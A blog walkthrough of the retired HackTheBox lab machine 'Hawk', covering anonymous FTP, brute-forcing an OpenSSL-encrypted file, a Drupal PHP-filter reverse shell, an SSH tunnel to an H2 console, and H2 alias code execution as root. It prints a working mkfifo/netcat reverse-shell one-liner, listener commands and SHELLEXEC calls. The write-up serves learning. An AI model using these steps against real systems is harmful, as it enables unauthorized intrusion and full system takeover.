Hackthebox - Retired - Hawk
Recon
I've started to use Threader3000 for my inital recon scans. It uses threaded scans to make initial scans much quicker. Then based on the results of those initial scan it will recommend a nmap scan for just open ports, it also outputs all the results for historical purposes. Me Gusta Threader3000
Here is the first scan and the optional nmap scan that we can now run with based on the results. I used to do this manually and scan all TCP ports then run a second more aggressive scan based on the results of the first scan. But now this is automated for me with this tool :)
Here is the output xml converted to HTML to make it pretty
xsltproc ./hawk.htb.xml -o ./hawk.htb.html
OK so we have
Port 21 vsftpd version 3.03
Port 22 OpenSSH version 7.6p1
Port 80 Apache version 2.4.29
Port 5435 Something?
Port 8082 H2 Database http console
Port 9092 XMLpcREGSVC <- whatever that is
And according to the results we have anonymous FTP access on port 21 let's connect up to see what is there.
ftp
open hawk.htb
Username: anonymous
Password: anonymous
There is a directory called messages which contains a file called .drupal.txt.enc. I used mget to download to my kali box
mget .drupal.txt.enc
Then read the file with cat
cat ./.drupal.txt.enc
U2FsdGVkX19rWSAG1JNpLTawAmzz/ckaN1oZFZewtIM+e84km3Csja3GADUg2jJb
CmSdwTtr/IIShvTbUd0yQxfe9OuoMxxfNIUN/YPHx+vVw/6eOD+Cc1ftaiNUEiQz
QUf9FyxmCb2fuFoOXGphAMo+Pkc2ChXgLsj4RfgX+P7DkFa8w1ZA9Yj7kR+tyZfy
t4M0qvmWvMhAj3fuuKCCeFoXpYBOacGvUHRGywb4YCk=
Some crazy base64 encoded something or other..
let's get rid of the base64
cat .drupal.txt.enc | base64 -d
Salted__kY ԓi-6'l'''▒7Z''''>{'$'p''''5 '2[
'''''''''8?'sW'j#T$3AG',f '''Z\ja'>>G6
'.''E'''ÐV''V@'''''ɗ'''4'''''@'w'xZ''Ni''PtF''`)
Hmmm a bit of that is english… Salted?
Let's see if we can get any more info about this and use file to see if it knows what kind of file this is.
file .drupal.txt.enc
An openssl enc'd data with salted password. Well if they went through the trouble of encrypting it, we can go through the trouble of trying to decrypt it.
We first need to un-base64 this
So we can just do that in bash
Googling around for ways to get to this I found this program
https://manpages.debian.org/testing/bruteforce-salted-openssl/bruteforce-salted-openssl.1.en.html
Which we can install with apt
sudo apt-get install bruteforce-salted-openssl
So looking at the switches available we need to supply just a couple of things to try this out.
The encrypted file
The wordlist to use
The digest used
So we know two of these already the wordlist we want to use rockyou.txt and the encrypted file .drupal.txt
We are going to have to guess what type of digest. In my experience I was suggest sha256 since that is what i've seen most in the past.
So our final command would be
bruteforce-salted-openssl -t 50 -f /usr/share/wordlists/rockyou.txt -d sha256 ./drupal.txt
The -t is just how many threads we want to use.
Looks like the password used to encrypt the file is friends.
So now we can use openssl to try and see what is in the file
This site will walk us through that process ( hopefully )
https://www.shellhacks.com/encrypt-decrypt-file-password-openssl/
Here is the example they give with a password protected file
openssl enc -aes-256-cbc -d -in file.txt.enc -out file.txt -k PASS
So we will modify that for our use ( I tried sha-256 here and some other switches and got a bunch of different errors)
openssl aes-256-cbc -d -in ./drupal.txt -out ./dectypted.txt -k friends
Now we get this when we cat our output file
Looks like we have a name and a password now
Daniel
PencilKeyboardScanner123
Okay so that was the what we can find on the FTP Port let's see what is available on port 80
Unsurprisingly we see a drupal page with a login form. Drupal is a Content Management System
Let's try the username of Daniel and the password we found
Nope what if we try admin instead. BINGO
So I found this site which will help us with getting a foothold on the site.
https://www.sevenlayers.com/index.php/164-drupal-to-reverse-shell
The premise is pretty simple, enable PHP and then add a new page with our php exploit.
So let's start with enabling PHP.
Choose modules at the top
Find PHP Filter and click enable
Then scroll to the bottom and save configuration
Now we need to modify the PHP filter permissions
Now still following along with the blog we found, we need to give the administrator users the rights to use PHP Code.
So click the administrator box and then scroll down and save again.
Now we should be able to add php code to Drupal. Let's test with a php info page.
Let's add new content.
Let's make a "basic page"
We need to change the text format to PHP Code, then add phpinfo(); to the body and give it a name.
Now we scroll down to preview, we get this
The phpinfo page.
Great now we know we can add php to the site and with that knowledge we can move over to exploiting this drupal to get a reverse shell.
I'm going to use the reverse php shell from penetestmonkey's site.. Monkies got monkey
http://pentestmonkey.net/tools/web-shells/php-reverse-shell
Exploit
I'm going to use the reverse php shell from penetestmonkey's site.. Monkeys' got monkey
http://pentestmonkey.net/tools/web-shells/php-reverse-shell
Ok before we can get this going let's download the php. We need to edit two fields in the php.. IP and PORT
These need to be changed to our VPN IP and the port we want to listen on
So Here is the results for my machine to use port 5555 and my VPN ip address.
So to catch the shell we need to setup a listener on our kali box
nc -lnvp 5555
So now I just need to copy and paste this into the body of the php test that we're testing earlier, and do a new preview.
So now when we do preview, we catch the shell
Alright we got a foothold as www-data, let's start poking around to see if we can find a way to escalate out of this account to another account.
Well, normally on HackTheBox we don't get immediate access to the user folder to get user.txt as www-data, but this one does we can get into daniels /home/daniel folder and cat out the user.txt file.
I always find it useful on hackthebox to poke around in /var/www folder alot of the time there are credentials in there. I did find this in /var/www/html/sites/defualt
settings.php
Looks like another set of creds. This shell is kinda crappy so I want to see if we can get into the ssh with these creds
User drupal didn't work
But daniel did… but
It drops us into python…
Luckily we can escape out of this.
First we will import os, then launch /bin/bash
Import os
os.system("/bin/bash")
Ok now we have a proper shell to see how we might escalate.
One of the first things I always check is the sudoers file to see if they have any rights..
Nope
Ok Let's use netcat to copy over linpeas.sh to do some enumeration for us.
https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/linPEAS
On my kali box i'll setup a listener
nc -lnvp 5555 < ./linpeas.sh
Then on hawk we get the file with
nc 10.10.14.6 5555 > linpeas.sh
Then we need to give linpeas.sh execution rights on hawk
chmod +x ./linpeas.sh
Then we can run leanpas.sh on hawk
./linpeas.sh
There are no obvious paths I can see here like SUID or SGID file or cron jobs. Let's look back at our initial recon to see what else is on this box.
There are three other ports we haven't looked at yet or found use for.
Port 5435 Something?
Port 8082 H2 Database http console
Port 9092 XMLpcREGSVC <- whatever that is
What is that H2 database?
Let's try pulling up the site in our browser.
No remote connections huh? No worries we have a local connection now anyway.
Curl give a redirect notice
But I want to see exactly the site show, to see if we can get some info off it…
For this let's use an ssh tunnel
Since we have access to the machine with ssh we create a local port on our kali box and forward all requests from our Kali local port to the hawk local port over ssh.
ssh -L 5555:localhost:8082 daniel@hawk.htb
Let's break this down if your not familiar
Ssh you should now
-L is to create a local port
5555:localhost:8082
So with this last part we are creating a local port of 5555 on our kali box and forwarding anything we send to that port to the hawk port of 8082.
Then we just authenticate to our ssh session and we can now browse port 8082 of hawk on our local port of 5555
Pretty cool right?
Here is the setting that denied our initial requests before we setup our tunnel.
So googling around for H2 exploit I first came across this exploit.
https://www.exploit-db.com/exploits/45506
Which basically says you can create a new database by changing the connection string, it will automatically create that database and there will be no password for the SA account on that newly created DB….. What the what?
So on the test connection string I just added circusmonkey after test. And was greeted with a brand new DB that I have full control of.
jdbc:h2:tcp://localhost/~/testcircusmonkey
I found this exploit when creating an alias in H2, we can create an alias to files on the system, but we can also use it to create aliases for executables…
So I just popped their alias string into my new db
https://mthbernardes.github.io/rce/2018/03/14/abusing-h2-database-alias.html
No errors, that's good. Now we should be able to pass anything we want to the console with this alias.
CALL SHELLEXEC('id')
Root, this is running as root..
Pretty trivial here to pop out the root.txt file
But what is the fun of just reading a txt file I want a root shell
I setup a new listener on my kali box on port 5566
nc -lnvp 5566
I tried netcat and some other standard shells and couldn't get it to connect. I switched back to my ssh session and tried doing them manually and could only get mkfifo to work.
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.6 5566>/tmp/f
SHELLEXEC doesnt' work when I try this directly so I had it echo out to a file named RS.sh in the tmp folder I created earlier.
So I used my existing shell to create the file
Then used the DB to give it execution rights.
CALL SHELLEXEC('chmod +x /tmp/circusmonkey/rs.sh')
Now hopefully we can just call it from the DB for our shell.
That was fun.
Comments
Post a Comment